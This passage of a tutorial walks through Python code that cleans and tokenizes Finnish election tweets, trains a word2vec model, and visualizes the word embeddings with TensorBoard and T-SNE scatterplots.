Moving on, let’s look at the first preprocessing step. This function takes the raw text strings dumped from Tweets, removes unwanted characters and features (such as user names and URLs), removes duplicates, and returns a list of sanitized strings. Here, I’m not using string.printable for a list of characters to keep, since Finnish includes additional letters that aren’t part of the english alphabet (äöåÄÖÅ). The regular expressions used in this step have been somewhat tailored for the raw input data. Hence, you may need to tweak them for your own input corpus.

def process_raw_data(input_file):
  valid = u"0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ#@.:/ äöåÄÖÅ"
  url_match = "(https?:\/\/[0-9a-zA-Z\-\_]+\.[\-\_0-9a-zA-Z]+\.?[0-9a-zA-Z\-\_]*\/?.*)"
  name_match = "\@[\_0-9a-zA-Z]+\:?"
  lines = []
  print("Loading raw data from: " + input_file)
  if os.path.exists(input_file):
    with io.open(input_file, 'r', encoding="utf-8") as f:
      lines = f.readlines()
  num_lines = len(lines)
  ret = []
  for count, text in enumerate(lines):
    if count % 50 == 0:
      print_progress(count, num_lines)
    text = re.sub(url_match, u"", text)
    text = re.sub(name_match, u"", text)
    text = re.sub("\&amp\;?", u"", text)
    text = re.sub("[\:\.]{1,}$", u"", text)
    text = re.sub("^RT\:?", u"", text)
    text = u''.join(x for x in text if x in valid)
    text = text.strip()
    if len(text.split()) > 5:
      if text not in ret:
        ret.append(text)
  return ret

The next step is to tokenize each sentence (or Tweet) into words.

def tokenize_sentences(sentences):
  ret = []
  max_s = len(sentences)
  print("Got " + str(max_s) + " sentences.")
  for count, s in enumerate(sentences):
    tokens = []
    words = re.split(r'(\s+)', s)
    if len(words) > 0:
      for w in words:
        if w is not None:
          w = w.strip()
          w = w.lower()
          if w.isspace() or w == "\n" or w == "\r":
            w = None
          if len(w) < 1:
            w = None
          if w is not None:
            tokens.append(w)
    if len(tokens) > 0:
      ret.append(tokens)
    if count % 50 == 0:
      print_progress(count, max_s)
  return ret

The final text preprocessing step removes unwanted tokens. This includes numeric data and stop words. Stop words are the most common words in a language. We omit them from processing in order to bring out the meaning of the text in our analysis. I downloaded a json dump of stop words for all languages from here, and placed it in the same directory as this script. If you plan on trying this code out yourself, you’ll need to perform the same steps. Note that I included extra stopwords of my own. After looking at the output of this step, I noticed that Twitter’s truncation of some tweets caused certain word fragments to occur frequently.

def clean_sentences(tokens):
  all_stopwords = load_json("stopwords-iso.json")
  extra_stopwords = ["ssä", "lle", "h.", "oo", "on", "muk", "kov", "km", "ia", "täm", "sy", "but", ":sta", "hi", "py", "xd", "rr", "x:", "smg", "kum", "uut", "kho", "k", "04n", "vtt", "htt", "väy", "kin", "#8", "van", "tii", "lt3", "g", "ko", "ett", "mys", "tnn", "hyv", "tm", "mit", "tss", "siit", "pit", "viel", "sit", "n", "saa", "tll", "eik", "nin", "nii", "t", "tmn", "lsn", "j", "miss", "pivn", "yhn", "mik", "tn", "tt", "sek", "lis", "mist", "tehd", "sai", "l", "thn", "mm", "k", "ku", "s", "hn", "nit", "s", "no", "m", "ky", "tst", "mut", "nm", "y", "lpi", "siin", "a", "in", "ehk", "h", "e", "piv", "oy", "p", "yh", "sill", "min", "o", "va", "el", "tyn", "na", "the", "tit", "to", "iti", "tehdn", "tlt", "ois", ":", "v", "?", "!", "&"]
  stopwords = None
  if all_stopwords is not None:
    stopwords = all_stopwords["fi"]
    stopwords += extra_stopwords
  ret = []
  max_s = len(tokens)
  for count, sentence in enumerate(tokens):
    if count % 50 == 0:
      print_progress(count, max_s)
    cleaned = []
    for token in sentence:
      if len(token) > 0:
        if stopwords is not None:
          for s in stopwords:
            if token == s:
              token = None
        if token is not None:
            if re.search("^[0-9\.\-\s\/]+$", token):
              token = None
        if token is not None:
            cleaned.append(token)
    if len(cleaned) > 0:
      ret.append(cleaned)
  return ret

The next function creates a vocabulary from the processed text. A vocabulary, in this context, is basically a list of all unique tokens in the data. This function creates a frequency distribution of all tokens (words) by counting the number of occurrences of each token. We will use this later to “trim” the vocabulary down to a manageable size.

def get_word_frequencies(corpus):
  frequencies = Counter()
  for sentence in corpus:
    for word in sentence:
      frequencies[word] += 1
  freq = frequencies.most_common()
  return freq

Now we’re done with all preprocessing steps, let’s get into the more interesting analysis functions. The following function accepts the tokenized and cleaned data generated from the steps above, and uses it to train a word2vec model. The num_features parameter sets the number of features each word is assigned (and hence the dimensionality of the resulting tensor.) It is recommended to set it between 100 and 1000. Naturally, larger values take more processing power and memory/disk space to handle. I found 200 to be enough, but I normally start with a value of 300 when looking at new datasets. The min_count variable passed to word2vec designates how to trim the vocabulary. For example, if min_count is set to 3, all words that appear in the data set less than 3 times will be discarded from the vocabulary used when training the word2vec model. In the dimensionality reduction step we perform later, large vocabulary sizes cause T-SNE iterations to take a long time. Hence, I tuned min_count to generate a vocabulary of around 10,000 words. Increasing the value of sample, will cause word2vec to randomly omit words with high frequency counts. I decided that I wanted to keep all of those words in my analysis, so it’s set to zero. Increasing epoch_count will cause word2vec to train for more iterations, which will, naturally take longer. Increase this if you have a fast machine or plenty of time on your hands 🙂

def get_word2vec(sentences):
  num_workers = multiprocessing.cpu_count()
  num_features = 200
  epoch_count = 10
  sentence_count = len(sentences)
  w2v_file = os.path.join(save_dir, "word_vectors.w2v")
  word2vec = None
  if os.path.exists(w2v_file):
    print("w2v model loaded from " + w2v_file)
    word2vec = w2v.Word2Vec.load(w2v_file)
  else:
    word2vec = w2v.Word2Vec(sg=1,
                            seed=1,
                            workers=num_workers,
                            size=num_features,
                            min_count=min_frequency_val,
                            window=5,
                            sample=0)

    print("Building vocab...")
    word2vec.build_vocab(sentences)
    print("Word2Vec vocabulary length:", len(word2vec.wv.vocab))
    print("Training...")
    word2vec.train(sentences, total_examples=sentence_count, epochs=epoch_count)
    print("Saving model...")
    word2vec.save(w2v_file)
  return word2vec

Tensorboard has some good tools to visualize word embeddings in the word2vec model we just created. These visualizations can be accessed using the “projector” tab in the interface. Here’s code to create tensorboard embeddings:

def create_embeddings(word2vec):
  all_word_vectors_matrix = word2vec.wv.syn0
  num_words = len(all_word_vectors_matrix)
  vocab = word2vec.wv.vocab.keys()
  vocab_len = len(vocab)
  dim = word2vec.wv[vocab[0]].shape[0]
  embedding = np.empty((num_words, dim), dtype=np.float32)
  metadata = ""
  for i, word in enumerate(vocab):
    embedding[i] = word2vec.wv[word]
    metadata += word + "\n"
  metadata_file = os.path.join(save_dir, "metadata.tsv")
  with io.open(metadata_file, "w", encoding="utf-8") as f:
    f.write(metadata)

  tf.reset_default_graph()
  sess = tf.InteractiveSession()
  X = tf.Variable([0.0], name='embedding')
  place = tf.placeholder(tf.float32, shape=embedding.shape)
  set_x = tf.assign(X, place, validate_shape=False)
  sess.run(tf.global_variables_initializer())
  sess.run(set_x, feed_dict={place: embedding})

  summary_writer = tf.summary.FileWriter(save_dir, sess.graph)
  config = projector.ProjectorConfig()
  embedding_conf = config.embeddings.add()
  embedding_conf.tensor_name = 'embedding:0'
  embedding_conf.metadata_path = 'metadata.tsv'
  projector.visualize_embeddings(summary_writer, config)

  save_file = os.path.join(save_dir, "model.ckpt")
  print("Saving session...")
  saver = tf.train.Saver()
  saver.save(sess, save_file)

Once this code has been run, tensorflow log entries will be created in save_dir. To start a tensorboard session, run the following command from the same directory where this script was run from:

tensorboard –logdir=save_dir

You should see output like the following once you’ve run the above command:

TensorBoard 0.4.0rc3 at http://node.local:6006 (Press CTRL+C to quit)

Navigate your web browser to localhost:<port_number> to see the interface. From the “Inactive” pulldown menu, select “Projector”.

tensorboard projector menu item

The “projector” menu is often hiding under the “inactive” pulldown.

Once you’ve selected “projector”, you should see a view like this:

Tensorboard's projector view

Tensorboard’s projector view allows you to interact with word embeddings, search for words, and even run t-sne on the dataset.

There are a lot of things to play around with in this view. You can search for words, fly around the embeddings, and even run t-sne (on the bottom left) on the dataset. If you get to this step, have fun playing with the interface!

And now, back to the code. One of word2vec’s most interesting functions is to find similarities between words. This is done via the word2vec.wv.most_similar() call. The following function calls word2vec.wv.most_similar() for a word and returns num-similar words. The returned value is a list containing the queried word, and a list of similar words. ( [queried_word, [similar_word1, similar_word2, …]] ).

def most_similar(input_word, num_similar):
  sim = word2vec.wv.most_similar(input_word, topn=num_similar)
  output = []
  found = []
  for item in sim:
    w, n = item
    found.append(w)
  output = [input_word, found]
  return output

The following function takes a list of words to be queried, passes them to the above function, saves the output, and also passes the queried words to t_sne_scatterplot(), which we’ll show later. It also writes a csv file – associations.csv – which can be imported into Gephi to generate graphing visualizations. You can see some Gephi-generated visualizations in the accompanying blog post.

I find that manually viewing the word2vec_test.json file generated by this function is a good way to read the list of similarities found for each word queried with wv.most_similar().

def test_word2vec(test_words):
  vocab = word2vec.wv.vocab.keys()
  vocab_len = len(vocab)
  output = []
  associations = {}
  test_items = test_words
  for count, word in enumerate(test_items):
    if word in vocab:
      print("[" + str(count+1) + "] Testing: " + word)
      if word not in associations:
        associations[word] = []
      similar = most_similar(word, num_similar)
      t_sne_scatterplot(word)
      output.append(similar)
      for s in similar[1]:
        if s not in associations[word]:
          associations[word].append(s)
    else:
      print("Word " + word + " not in vocab")
  filename = os.path.join(save_dir, "word2vec_test.json")
  save_json(output, filename)
  filename = os.path.join(save_dir, "associations.json")
  save_json(associations, filename)
  filename = os.path.join(save_dir, "associations.csv")
  handle = io.open(filename, "w", encoding="utf-8")
  handle.write(u"Source,Target\n")
  for w, sim in associations.iteritems():
    for s in sim:
      handle.write(w + u"," + s + u"\n")
  return output

The next function implements standalone code for creating a scatterplot from the output of T-SNE on a set of data points obtained from a word2vec.wv.most_similar() query. The scatterplot is visualized with matplotlib. Unfortunately, my matplotlib skills leave a lot to be desired, and these graphs don’t look great. But they’re readable.

def t_sne_scatterplot(word):
  vocab = word2vec.wv.vocab.keys()
  vocab_len = len(vocab)
  dim0 = word2vec.wv[vocab[0]].shape[0]
  arr = np.empty((0, dim0), dtype='f')
  w_labels = [word]
  nearby = word2vec.wv.similar_by_word(word, topn=num_similar)
  arr = np.append(arr, np.array([word2vec[word]]), axis=0)
  for n in nearby:
    w_vec = word2vec[n[0]]
    w_labels.append(n[0])
    arr = np.append(arr, np.array([w_vec]), axis=0)

  tsne = TSNE(n_components=2, random_state=1)
  np.set_printoptions(suppress=True)
  Y = tsne.fit_transform(arr)
  x_coords = Y[:, 0]
  y_coords = Y[:, 1]

  plt.rc("font", size=16)
  plt.figure(figsize=(16, 12), dpi=80)
  plt.scatter(x_coords[0], y_coords[0], s=800, marker="o", color="blue")
  plt.scatter(x_coords[1:], y_coords[1:], s=200, marker="o", color="red")

  for label, x, y in zip(w_labels, x_coords, y_coords):
    plt.annotate(label.upper(), xy=(x, y), xytext=(0, 0), textcoords='offset points')
  plt.xlim(x_coords.min()-50, x_coords.max()+50)
  plt.ylim(y_coords.min()-50, y_coords.max()+50)
  filename = os.path.join(plot_dir, word + "_tsne.png")
  plt.savefig(filename)
  plt.close()

In order to create a scatterplot of the entire vocabulary, we need to perform T-SNE over that whole dataset. This can be a rather time-consuming operation. The next function performs that operation, attempting to save and re-load intermediate steps (since some of them can take over 30 minutes to complete).

def calculate_t_sne():
  vocab = word2vec.wv.vocab.keys()
  vocab_len = len(vocab)
  arr = np.empty((0, dim0), dtype='f')
  labels = []
  vectors_file = os.path.join(save_dir, "vocab_vectors.npy")
  labels_file = os.path.join(save_dir, "labels.json")
  if os.path.exists(vectors_file) and os.path.exists(labels_file):
    print("Loading pre-saved vectors from disk")
    arr = load_bin(vectors_file)
    labels = load_json(labels_file)
  else:
    print("Creating an array of vectors for each word in the vocab")
    for count, word in enumerate(vocab):
      if count % 50 == 0:
        print_progress(count, vocab_len)
      w_vec = word2vec[word]
      labels.append(word)
      arr = np.append(arr, np.array([w_vec]), axis=0)
    save_bin(arr, vectors_file)
    save_json(labels, labels_file)

  x_coords = None
  y_coords = None
  x_c_filename = os.path.join(save_dir, "x_coords.npy")
  y_c_filename = os.path.join(save_dir, "y_coords.npy")
  if os.path.exists(x_c_filename) and os.path.exists(y_c_filename):
    print("Reading pre-calculated coords from disk")
    x_coords = load_bin(x_c_filename)
    y_coords = load_bin(y_c_filename)
  else:
    print("Computing T-SNE for array of length: " + str(len(arr)))
    tsne = TSNE(n_components=2, random_state=1, verbose=1)
    np.set_printoptions(suppress=True)
    Y = tsne.fit_transform(arr)
    x_coords = Y[:, 0]
    y_coords = Y[:, 1]
    print("Saving coords.")
    save_bin(x_coords, x_c_filename)
    save_bin(y_coords, y_c_filename)
 return x_coords, y_coords, labels, arr

The next function takes the data calculated in the above step, and data obtained from test_word2vec(), and plots the results from each word queried on the scatterplot of the entire vocabulary. These plots are useful for visualizing which words are closer to others, and where clusters commonly pop up. This is the last function before we get onto the main routine.

def show_cluster_locations(results, labels, x_coords, y_coords):
  for item in results:
    name = item[0]
    print("Plotting graph for " + name)
    similar = item[1]
    in_set_x = []
    in_set_y = []
    out_set_x = []
    out_set_y = []
    name_x = 0
    name_y = 0
    for count, word in enumerate(labels):
      xc = x_coords[count]
      yc = y_coords[count]
      if word == name:
        name_x = xc
        name_y = yc
      elif word in similar:
        in_set_x.append(xc)
        in_set_y.append(yc)
      else:
        out_set_x.append(xc)
        out_set_y.append(yc)
    plt.figure(figsize=(16, 12), dpi=80)
    plt.scatter(name_x, name_y, s=400, marker="o", c="blue")
    plt.scatter(in_set_x, in_set_y, s=80, marker="o", c="red")
    plt.scatter(out_set_x, out_set_y, s=8, marker=".", c="black")
    filename = os.path.join(big_plot_dir, name + "_tsne.png")
    plt.savefig(filename)
    plt.close()

Now let’s write our main routine, which will call all the above functions, process our collected Twitter data, and generate visualizations. The first few lines take care of our three preprocessing steps, and generation of a frequency distribution / vocabulary. The script expects the raw Twitter data to reside in a relative path (data/tweets.txt). Change those variables as needed. Also, all output is saved to a subdirectory in the relative path (analysis/). Again, tailor this to your needs.

if __name__ == '__main__':
  input_dir = "data"
  save_dir = "analysis"
  if not os.path.exists(save_dir):
    os.makedirs(save_dir)

  print("Preprocessing raw data")
  raw_input_file = os.path.join(input_dir, "tweets.txt")
  filename = os.path.join(save_dir, "data.json")
  processed = try_load_or_process(filename, process_raw_data, raw_input_file)
  print("Unique sentences: " + str(len(processed)))

  print("Tokenizing sentences")
  filename = os.path.join(save_dir, "tokens.json")
  tokens = try_load_or_process(filename, tokenize_sentences, processed)

  print("Cleaning tokens")
  filename = os.path.join(save_dir, "cleaned.json")
  cleaned = try_load_or_process(filename, clean_sentences, tokens)

  print("Getting word frequencies")
  filename = os.path.join(save_dir, "frequencies.json")
  frequencies = try_load_or_process(filename, get_word_frequencies, cleaned)
  vocab_size = len(frequencies)
  print("Unique words: " + str(vocab_size))

Next, I trim the vocabulary, and save the resulting list of words. This allows me to look over the trimmed list and ensure that the words I’m interested in survived the trimming operation. Due to the nature of the Finnish language, (and Twitter), the vocabulary of our “cleaned” set, prior to trimming, was over 100,000 unique words. After trimming it ended up at around 11,000 words.

  trimmed_vocab = []
  min_frequency_val = 6
  for item in frequencies:
    if item[1] >= min_frequency_val:
      trimmed_vocab.append(item[0])
  trimmed_vocab_size = len(trimmed_vocab)
  print("Trimmed vocab length: " + str(trimmed_vocab_size))
  filename = os.path.join(save_dir, "trimmed_vocab.json")
  save_json(trimmed_vocab, filename)

The next few lines do all the compute-intensive work. We’ll create a word2vec model with the cleaned token set, create tensorboard embeddings (for the visualizations mentioned above), and calculate T-SNE. Yes, this part can take a while to run, so go put the kettle on.

  print
  print("Instantiating word2vec model")
  word2vec = get_word2vec(cleaned)
  vocab = word2vec.wv.vocab.keys()
  vocab_len = len(vocab)
  print("word2vec vocab contains " + str(vocab_len) + " items.")
  dim0 = word2vec.wv[vocab[0]].shape[0]
  print("word2vec items have " + str(dim0) + " features.")

  print("Creating tensorboard embeddings")
  create_embeddings(word2vec)

  print("Calculating T-SNE for word2vec model")
  x_coords, y_coords, labels, arr = calculate_t_sne()

Finally, we’ll take the top 50 most frequent words from our frequency distrubution, query them for 40 most similar words, and plot both labelled graphs of each set, and a “big plot” of that set on the entire vocabulary.

  plot_dir = os.path.join(save_dir, "plots")
  if not os.path.exists(plot_dir):
    os.makedirs(plot_dir)

  num_similar = 40
  test_words = []
  for item in frequencies[:50]:
    test_words.append(item[0])
  results = test_word2vec(test_words)

  big_plot_dir = os.path.join(save_dir, "big_plots")
  if not os.path.exists(big_plot_dir):
    os.makedirs(big_plot_dir)
  show_cluster_locations(results, labels, x_coords, y_coords)

And that’s it! Rather a lot of code, but it does quite a few useful tasks. If you’re interested in seeing the visualizations I created using this tool against the Tweets collected from the January 2018 Finnish presidential elections, check out this blog post.